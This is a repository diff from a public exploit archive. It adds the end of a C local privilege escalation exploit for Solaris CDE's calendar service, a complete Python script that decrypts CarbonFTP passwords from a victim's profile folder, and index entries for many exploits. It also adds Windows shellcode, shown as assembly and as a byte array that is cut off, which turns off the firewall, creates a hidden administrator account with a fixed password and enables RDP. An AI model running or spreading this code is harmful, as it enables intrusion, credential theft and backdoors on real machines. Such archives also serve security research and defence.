buf[sizeof(buf) - 1] = 0x0;
/* fill with function address in ld.so.1, saved eip, and arguments */
for (i = 0; i < BUFSIZE - 16; i += 4) {
set_val(buf, i, ret); /* strcpy */
set_val(buf, i += 4, rwx_mem); /* saved eip */
set_val(buf, i += 4, rwx_mem); /* 1st argument */
set_val(buf, i += 4, payaddr); /* 2nd argument */
}
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using SI_HOSTNAME\t: %s\n", hostname);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* create the evil calendar file */
fprintf(stderr, "Preparing the evil calendar file... ");
snprintf(cmd, sizeof(cmd), "%s -a -c hax0r@%s", ADMIN, hostname);
if (system(cmd) == -1) {
perror("Error creating calendar file");
exit(1);
}
if (chmod("/usr/spool/calendar/callog.hax0r", 0660) == -1) {
perror("Error creating calendar file");
exit(1);
}
/* prepare the evil calendar file (badchars currently not handled) */
fp = fopen("/usr/spool/calendar/callog.hax0r", "w");
if (!fp) {
perror("Error preparing calendar file");
exit(1);
}
fprintf(fp, "Version: 4\n(calendarattributes "
"(\"-//XAPIA/CSA/CALATTR//NONSGML Access List//EN\","
"\"10:access_list\",\"world:2\")\n");
/* buffer overflow in calendar name */
fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
"\"5:string\",\"%s\")\n", buf);
fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
"\"6:user\",\"fnord\")\n)");
/* buffer overflow in calendar owner */
/*
fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
"\"5:string\",\"hax0r\")\n");
fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
"\"6:user\",\"%s\")\n)", buf);
*/
fclose(fp);
fprintf(stderr, "Done.\n");
/* run the vulnerable program */
fprintf(stderr, "Exploiting... Please answer \"n\" when prompted.\n");
execve(VULN, arg, env);
perror("execve");
exit(0);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}
/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
exit(1);
}
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "Sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_zero(addr - 4, sym);
return addr;
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "Can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address NULL bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return addr_old;
}
/*
* set_val(): copy a dword inside a buffer (little endian)
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0x000000ff);
buf[pos + 1] = (val & 0x0000ff00) >> 8;
buf[pos + 2] = (val & 0x00ff0000) >> 16;
buf[pos + 3] = (val & 0xff000000) >> 24;
}

241
exploits/windows/remote/48363.py Executable file
View file

@ -0,0 +1,241 @@
# Title: Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption
# Date: 2020-04-20
# Author: hyp3rlinx
# Vendor:
# CVE: CVE-2020-6857
import time, string, sys, argparse, os, codecs
#Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version.
#This should be compatible for Python 2 and 3 versions now, tested successfully.
#Sample test password
#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947
key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program.
chunk_sz=5 #number of bytes we must decrypt the password by.
#Password is stored here:
#C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP
#Neowise CarbonFTP v1.4
#Insecure Proprietary Password Encryption
#By John Page (aka hyp3rlinx)
#Apparition Security
#===================================================
def carbonftp_conf(conf_file):
p=""
pipe=-1
passwd=""
lst_of_passwds=[]
try:
for p in conf_file:
idx = p.find("Password=STRING|")
if idx != -1:
pipe = p.find("|")
if pipe != -1:
passwd = p[pipe + 2: -2]
print(" Password found: "+ passwd)
lst_of_passwds.append(passwd)
except Exception as e:
print(str(e))
return lst_of_passwds
def reorder(lst):
k=1
j=0
for n in range(len(lst)):
k+=1
j+=1
try:
tmp = lst[n+k]
a = lst[n+j]
lst[n+j] = tmp
lst[n+k] = a
except Exception as e:
pass
return ''.join(lst)
def dec2hex(dec):
tmp = str(hex(int(dec)))
return str(tmp[2:])
#Updated for Python version compatibility.
def hex2ascii(h):
h=h.strip()
passwd=""
try:
passwd = codecs.decode(h, "hex").decode("ascii")
except Exception as e:
print("[!] In hex2ascii(), not a valid hex string.")
exit()
return passwd
def chunk_passwd(passwd_lst):
lst = []
for passwd in passwd_lst:
while passwd:
lst.append(passwd[:chunk_sz])
passwd = passwd[chunk_sz:]
return lst
def strip_non_printable_char(str):
return ''.join([x for x in str if ord(x) > 31 or ord(x)==9])
cnt = 0
passwd_str=""
def deob(c):
global cnt, passwd_str
tmp=""
try:
tmp = int(c) - int(key, 16)
tmp = dec2hex(tmp)
except Exception as e:
print("[!] Not a valid CarbonFTP encrypted password.")
exit()
b=""
a=""
#Seems we can delete the second char as its most always junk.
if cnt!=1:
a = tmp[:2]
cnt+=1
else:
b = tmp[:4]
passwd_str += strip_non_printable_char(hex2ascii(a + b))
hex_passwd_lst = list(passwd_str)
return hex_passwd_lst
def no_unique_chars(lst):
c=0
k=1
j=0
for i in range(len(lst)):
k+=1
j+=1
try:
a = lst[i]
b = lst[i+1]
if a != b:
c+=1
elif c==0:
print("[!] Possible one char password?: " +str(lst[0]))
return lst[0]
except Exception as e:
pass
return False
def decryptor(result_lst):
global passwd_str, sz
print(" Decrypting ... \n")
for i in result_lst:
print("[-] "+i)
time.sleep(0.1)
lst = deob(i)
#Re-order chars to correct sequence using custom swap function (reorder).
reordered_pass = reorder(lst)
sz = len(reordered_pass)
#Flag possible single char password.
no_unique_chars(lst)
print("[+] PASSWORD LENGTH: " + str(sz))
if sz == 9:
return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " +
reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)
#Shorter passwords less then nine chars will have several candidates
#as they get padded with repeating chars so we return those.
passwd_str=""
return reordered_pass
def display_cracked_passwd(sz, passwd):
if sz==9:
print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
else:
print("[*] DECRYPTED PASSWORD: "+passwd + "\n")
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
return parser.parse_args()
def main(args):
global passwd_str, sz
victim=""
if args.user and args.encrypted_password:
print("[!] Supply a victims username -u or single encrypted password -p, not both.")
exit()
print("[+] Neowise CarbonFTP v1.4")
time.sleep(0.1)
print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
time.sleep(0.1)
print("[+] Version 2 Exploit fixed for Python 3 compatibility")
time.sleep(0.1)
print("[+] Discovered and cracked by hyp3rlinx")
time.sleep(0.1)
print("[+] ApparitionSec\n")
time.sleep(1)
#Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
if args.user:
victim = args.user
os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
dir_lst = os.listdir(".")
for c in dir_lst:
f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
#Get encrypted password from conf file
passwd_enc = carbonftp_conf(f)
#Break up into 5 byte chunks as processed by the proprietary decryption routine.
result_lst = chunk_passwd(passwd_enc)
#Decrypt the 5 byte chunks and reassemble to the cleartext password.
cracked_passwd = decryptor(result_lst)
#Print cracked password or candidates.
display_cracked_passwd(sz, cracked_passwd)
time.sleep(0.3)
passwd_str=""
f.close()
#Crack a single password -p flag.
if args.encrypted_password:
passwd_to_crack_lst = []
passwd_to_crack_lst.append(args.encrypted_password)
result = chunk_passwd(passwd_to_crack_lst)
#Print cracked password or candidates.
cracked_passwd = decryptor(result)
display_cracked_passwd(sz, cracked_passwd)
if __name__=="__main__":
parser = argparse.ArgumentParser()
if len(sys.argv)==1:
parser.print_help(sys.stderr)
exit()
main(parse_args())

11
files_exploits.csv
View file

@ -11036,6 +11036,7 @@ id,file,description,date,author,type,platform,port
48350,exploits/windows/local/48350.py,"Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))",2020-04-20,Cervoise,local,windows,
48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,
48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows,
48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -18108,7 +18109,8 @@ id,file,description,date,author,type,platform,port
48338,exploits/multiple/remote/48338.rb,"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)",2020-04-16,Metasploit,remote,multiple,
48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux,
48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
53,exploits/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution",2003-07-10,knight420,webapps,cgi,
@ -42591,3 +42593,10 @@ id,file,description,date,author,type,platform,port
48342,exploits/hardware/webapps/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",webapps,hardware,
48345,exploits/php/webapps/48345.txt,"Centreon 19.10.5 - 'id' SQL Injection",2020-04-20,"Basim Alabdullah",webapps,php,
48348,exploits/php/webapps/48348.txt,"Fork CMS 5.8.0 - Persistent Cross-Site Scripting",2020-04-20,Vulnerability-Lab,webapps,php,
48354,exploits/php/webapps/48354.txt,"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting",2020-04-21,"Metin Yunus Kandemir",webapps,php,
48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php,
48357,exploits/php/webapps/48357.txt,"CSZ CMS 1.2.7 - 'title' HTML Injection",2020-04-21,"Metin Yunus Kandemir",webapps,php,
48358,exploits/hardware/webapps/48358.py,"IQrouter 3.3.1 Firmware - Remote Code Execution",2020-04-21,drakylar,webapps,hardware,
48360,exploits/json/webapps/48360.txt,"NSClient++ 0.5.2.35 - Authenticated Remote Code Execution",2020-04-21,kindredsec,webapps,json,
48361,exploits/php/webapps/48361.txt,"jizhi CMS 1.6.7 - Arbitrary File Download",2020-04-21,jizhicms,webapps,php,
48362,exploits/hardware/webapps/48362.txt,"P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)",2020-04-21,LiquidWorm,webapps,hardware,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -1019,3 +1019,4 @@ id,file,description,date,author,type,platform
48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux
48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows

1 id file description date author type platform
1019 48229 shellcodes/windows/48229.txt Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) 2020-03-18 boku shellcode windows
1020 48243 shellcodes/linux/48243.txt Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes) 2020-03-23 Upayan shellcode linux
1021 48252 shellcodes/windows_x86-64/48252.txt Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) 2020-03-25 boku shellcode windows_x86-64
1022 48355 shellcodes/windows/48355.c Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) 2020-04-21 boku shellcode windows

285
shellcodes/windows/48355.c Normal file
View file

@ -0,0 +1,285 @@
## Exploit Title: Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
## Exploit Author: Bobby Cooke
## Date: 2020-04-20
## Tested on: Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86)
## Description: Windows Shellcode that disables the Windows firewall, adds the user 'MajinBuu' with password 'TurnU2C@ndy!!' to the system, adds the user 'MajinBuu' to the local groups 'Administrators' & 'Remote Desktop Users', and then enables the RDP Service.
## Commands used:
## 'netsh firewall set opmode mode=DISABLE'
## 'net user MajinBuu TurnU2C@ndy!! /add'
## 'net localgroup Administrators MajinBuu /add'
## 'net localgroup "Remote Desktop Users" MajinBuu /add'
## 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
; Create stack frame
mov ebp, esp
sub esp, 0x30
; Find kernel32.dll base address
xor ebx, ebx
mov ebx, [fs:ebx+0x30] ; EBX = Address_of_PEB
mov ebx, [ebx+0xC] ; EBX = Address_of_LDR
mov ebx, [ebx+0x1C] ; EBX = 1st entry in InitOrderModuleList / ntdll.dll
mov ebx, [ebx] ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov ebx, [ebx] ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov eax, [ebx+0x8] ; EAX = &kernel32.dll / Address of kernel32.dll
mov [ebp-0x4], eax ; [EBP-0x04] = &kernel32.dll
; Find the address of the Export Table within kernel32.dll
mov ebx, [eax+0x3C] ; EBX = Offset NewEXEHeader
add ebx, eax ; EBX = &NewEXEHeader
mov ebx, [ebx+0x78] ; EBX = RVA ExportTable
add ebx, eax ; EBX = &ExportTable
; Find the address of the Name Pointer Table within kernel32.dll
mov edi, [ebx+0x20] ; EDI = RVA NamePointerTable
add edi, eax ; EDI = &NamePointerTable
mov [ebp-0x8], edi ; save &NamePointerTable to stack frame
; Find the address of the Ordinal Table
mov ecx, [ebx+0x24] ; ECX = RVA OrdinalTable
add ecx, eax ; ECX = &OrdinalTable
mov [ebp-0xC], ecx ; save &OrdinalTable to stack-frame
; Find the address of the Address Table
mov edx, [ebx+0x1C] ; EDX = RVA AddressTable
add edx, eax ; EDX = &AddressTable
mov [ebp-0x10], edx ; save &AddressTable to stack-frame
; Find Number of Functions within the Export Table of kernel32.dll
mov edx, [ebx+0x14] ; EDX = Number of Functions
mov [ebp-0x14], edx ; save value of Number of Functions to stack-frame
jmp short functions
findFunctionAddr:
; Initialize the Counter to prevent infinite loop
xor eax, eax ; EAX = Counter = 0
mov edx, [ebp-0x14] ; get value of Number of Functions from stack-frame
; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll
searchLoop:
mov edi, [ebp-0x8] ; EDI = &NamePointerTable
mov esi, [ebp-0x18] ; ESI = Address of String for the Symbol we are searching for
xor ecx, ecx ; ECX = 0x00000000
cld ; clear direction flag - Process strings from left to right
mov edi, [edi+eax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add edi, [ebp-0x4] ; EDI = &NameString = RVA NameString + &kernel32.dll
add cx, 0xF ; ECX = len("GetProcAddress,0x00") = 15 = 14 char + 1 Null
repe cmpsb ; compare first 8 bytes of [&NameString] to "GetProcAddress,0x00"
jz found ; If string at [&NameString] == "GetProcAddress,0x00", then end loop
inc eax ; else Counter ++
cmp eax, edx ; Does EAX == Number of Functions?
jb searchLoop ; If EAX != Number of Functions, then restart the loop
found:
; Find the address of GetProcAddress by using the last value of the Counter
mov ecx, [ebp-0xC] ; ECX = &OrdinalTable
mov edx, [ebp-0x10] ; EDX = &AddressTable
mov ax, [ecx + eax*2] ; AX = ordinalNumber = [&OrdinalTable + (Counter*2)]
mov eax, [edx + eax*4] ; EAX = RVA GetProcAddress = [&AddressTable + ordinalNumber]
add eax, [ebp-0x4] ; EAX = &GetProcAddress = RVA GetProcAddress + &kernel32.dll
ret
functions:
# Push string "GetProcAddress",0x00 onto the stack
xor eax, eax ; clear eax register
mov ax, 0x7373 ; AX is the lower 16-bits of the 32bit EAX Register
push eax ; ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s"
push 0x65726464 ; erdd : 65726464 // "GetProcAddress"
push 0x41636f72 ; Acor : 41636f72
push 0x50746547 ; PteG : 50746547
mov [ebp-0x18], esp ; save PTR to string at bottom of stack (ebp)
call findFunctionAddr ; After Return EAX will = &GetProcAddress
# EAX = &GetProcAddress
mov [ebp-0x1C], eax ; save &GetProcAddress
; Call GetProcAddress(&kernel32.dll, PTR "LoadLibraryA"0x00)
xor edx, edx ; EDX = 0x00000000
push edx ; null terminator for LoadLibraryA string
push 0x41797261 ; Ayra : 41797261 // "LoadLibraryA",0x00
push 0x7262694c ; rbiL : 7262694c
push 0x64616f4c ; daoL : 64616f4c
push esp ; $hModule -- push the address of the start of the string onto the stack
push dword [ebp-0x4] ; $lpProcName -- push base address of kernel32.dll to the stack
mov eax, [ebp-0x1C] ; Move the address of GetProcAddress into the EAX register
call eax ; Call the GetProcAddress Function.
mov [ebp-0x20], eax ; save Address of LoadLibraryA
; Call LoadLibraryA(PTR "msvcrt")
; push "msvcrt",0x00 to the stack and save pointer
xor eax, eax ; clear eax
mov ax, 0x7472 ; tr : 7472
push eax
push 0x6376736D ; cvsm : 6376736D
push esp ; push the pointer to the string
mov ebx, [ebp-0x20] ; LoadLibraryA Address to ebx register
call ebx ; call the LoadLibraryA Function to load msvcrt.dll
mov [ebp-0x24], eax ; save Address of msvcrt.dll
; Call GetProcAddress(msvcrt.dll, "system")
xor edx, edx
mov dx, 0x6d65 ; me : 6d65
push edx
push 0x74737973 ; tsys : 74737973
push esp ; push pointer to string to stack for 'system'
push dword [ebp-0x24] ; push base address of msvcrt.dll to stack
mov eax, [ebp-0x1C] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress
; EAX = WSAStartup Address
mov [ebp-0x28], eax ; save Address of msvcrt.system
; 'netsh firewall set opmode mode=DISABLE'
xor ecx, ecx
mov cx, 0x454c ; EL : 454c
push ecx
push 0x42415349 ; BASI : 42415349
push 0x443d6564 ; D=ed : 443d6564
push 0x6f6d2065 ; om e : 6f6d2065
push 0x646f6d70 ; domp : 646f6d70
push 0x6f207465 ; o te : 6f207465
push 0x73206c6c ; s ll : 73206c6c
push 0x61776572 ; awer : 61776572
push 0x69662068 ; if h : 69662068
push 0x7374656e ; sten : 7374656e
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system
; 'net user MajinBuu TurnU2C@ndy!! /add'
xor ecx, ecx
push ecx
push 0x6464612f ; dda/ : 6464612f
push 0x20212179 ; !!y : 20212179
push 0x646e4043 ; dn@C : 646e4043
push 0x32556e72 ; 2Unr : 32556e72
push 0x75542075 ; uT u : 75542075
push 0x75426e69 ; uBni : 75426e69
push 0x6a614d20 ; jaM : 6a614d20
push 0x72657375 ; resu : 72657375
push 0x2074656e ; ten : 2074656e
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system
; 'net localgroup Administrators MajinBuu /add'
xor ecx, ecx
push ecx
mov ecx, 0x64646190 ; dda : 646461
shr ecx, 8
push ecx
push 0x2f207575 ; / uu : 2f207575
push 0x426e696a ; Bnij : 426e696a
push 0x614d2073 ; aM s : 614d2073
push 0x726f7461 ; rota : 726f7461
push 0x72747369 ; rtsi : 72747369
push 0x6e696d64 ; nimd : 6e696d64
push 0x41207075 ; A pu : 41207075
push 0x6f72676c ; orgl : 6f72676c
push 0x61636f6c ; acol : 61636f6c
push 0x2074656e ; ten : 2074656e
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system
; 'net localgroup "Remote Desktop Users" MajinBuu /add'
xor ecx, ecx
push ecx
mov ecx, 0x64646190 ; dda : 646461
shr ecx, 8
push ecx
push 0x2f207575 ; / uu : 2f207575
push 0x426e696a ; Bnij : 426e696a
push 0x614d2022 ; aM " : 614d2022
push 0x73726573 ; sres : 73726573
push 0x5520706f ; U po : 5520706f
push 0x746b7365 ; tkse : 746b7365
push 0x44206574 ; D et : 44206574
push 0x6f6d6552 ; omeR : 6f6d6552
push 0x22207075 ; " pu : 22207075
push 0x6f72676c ; orgl : 6f72676c
push 0x61636f6c ; acol : 61636f6c
push 0x2074656e ; ten : 2074656e
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system
; 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
xor ecx, ecx
push ecx
push 0x662f2030 ; f/ 0 : 662f2030
push 0x20642f20 ; d/ : 20642f20
push 0x44524f57 ; DROW : 44524f57
push 0x445f4745 ; D_GE : 445f4745
push 0x5220742f ; R t/ : 5220742f
push 0x20736e6f ; sno : 20736e6f
push 0x69746365 ; itce : 69746365
push 0x6e6e6f43 ; nnoC : 6e6e6f43
push 0x5354796e ; STyn : 5354796e
push 0x65446620 ; eDf : 65446620
push 0x762f2022 ; v/ " : 762f2022
push 0x72657672 ; revr : 72657672
push 0x6553206c ; eS l : 6553206c
push 0x616e696d ; anim : 616e696d
push 0x7265545c ; reT\ : 7265545c
push 0x6c6f7274 ; lort : 6c6f7274
push 0x6e6f435c ; noC\ : 6e6f435c
push 0x7465536c ; teSl : 7465536c
push 0x6f72746e ; ortn : 6f72746e
push 0x6f43746e ; oCtn : 6f43746e
push 0x65727275 ; erru : 65727275
push 0x435c4d45 ; C\ME : 435c4d45
push 0x54535953 ; TSYS : 54535953
push 0x5c454e49 ; \ENI : 5c454e49
push 0x4843414d ; HCAM : 4843414d
push 0x5f4c4143 ; _LAC : 5f4c4143
push 0x4f4c5f59 ; OL_Y : 4f4c5f59
push 0x454b4822 ; EKH" : 454b4822
push 0x20646461 ; dda : 20646461
push 0x20676572 ; ger : 20676572
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system
######################################################################################
#include <windows.h>
#include <stdio.h>
char code[] = \
"\x89\xe5\x83\xec\x30\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x1b"
"\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7"
"\x89\x7d\xf8\x8b\x4b\x24\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53"
"\x14\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\xe8\x31\xc9\xfc\x8b"
"\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4"
"\x8b\x55\xf0\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xfc\xc3\x31\xc0\x66\xb8\x73\x73\x50"
"\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65\x74\x50\x89\x65\xe8\xe8\xb0\xff"
"\xff\xff\x89\x45\xe4\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f"
"\x61\x64\x54\xff\x75\xfc\x8b\x45\xe4\xff\xd0\x89\x45\xe0\x31\xc0\x66\xb8\x72\x74\x50"
"\x68\x6d\x73\x76\x63\x54\x8b\x5d\xe0\xff\xd3\x89\x45\xdc\x31\xd2\x66\xba\x65\x6d\x52"
"\x68\x73\x79\x73\x74\x54\xff\x75\xdc\x8b\x45\xe4\xff\xd0\x89\x45\xd8\x31\xc9\x66\xb9"
"\x4c\x45\x51\x68\x49\x53\x41\x42\x68\x64\x65\x3d\x44\x68\x65\x20\x6d\x6f\x68\x70\x6d"
"\x6f\x64\x68\x65\x74\x20\x6f\x68\x6c\x6c\x20\x73\x68\x72\x65\x77\x61\x68\x68\x20\x66"
"\x69\x68\x6e\x65\x74\x73\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\x68\x2f\x61\x64\x64\x68"
"\x79\x21\x21\x20\x68\x43\x40\x6e\x64\x68\x72\x6e\x55\x32\x68\x75\x20\x54\x75\x68\x69"
"\x6e\x42\x75\x68\x20\x4d\x61\x6a\x68\x75\x73\x65\x72\x68\x6e\x65\x74\x20\x54\x8b\x45"
"\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68\x75\x75\x20\x2f\x68"
"\x6a\x69\x6e\x42\x68\x73\x20\x4d\x61\x68\x61\x74\x6f\x72\x68\x69\x73\x74\x72\x68\x64"
"\x6d\x69\x6e\x68\x75\x70\x20\x41\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65"
"\x74\x20\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68"
"\x75\x75\x20\x2f\x68\x6a\x69\x6e\x42\x68\x22\x20\x4d\x61\x68\x73\x65\x72\x73\x68\x6f"
"\x70\x20\x55\x68\x65\x73\x6b\x74\x68\x74\x65\x20\x44\x68\x52\x65\x6d\x6f\x68\x75\x70"
"\x20\x22\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65\x74\x20\x54\x8b\x45\xd8"
"\xff\xd0\x31\xc9\x51\x68\x30\x20\x2f\x66\x68\x20\x2f\x64\x20\x68\x57\x4f\x52\x44\x68"
"\x45\x47\x5f\x44\x68\x2f\x74\x20\x52\x68\x6f\x6e\x73\x20\x68\x65\x63\x74\x69\x68\x43"
"\x6f\x6e\x6e\x68\x6e\x79\x54\x53\x68\x20\x66\x44\x65\x68\x22\x20\x2f\x76\x68\x72\x76"
"\x65\x72\x68\x6c\x20\x53\x65\x68\x6d\x69\x6e\x61\x68\x5c\x54\x65\x72\x68\x74\x72\x6f"
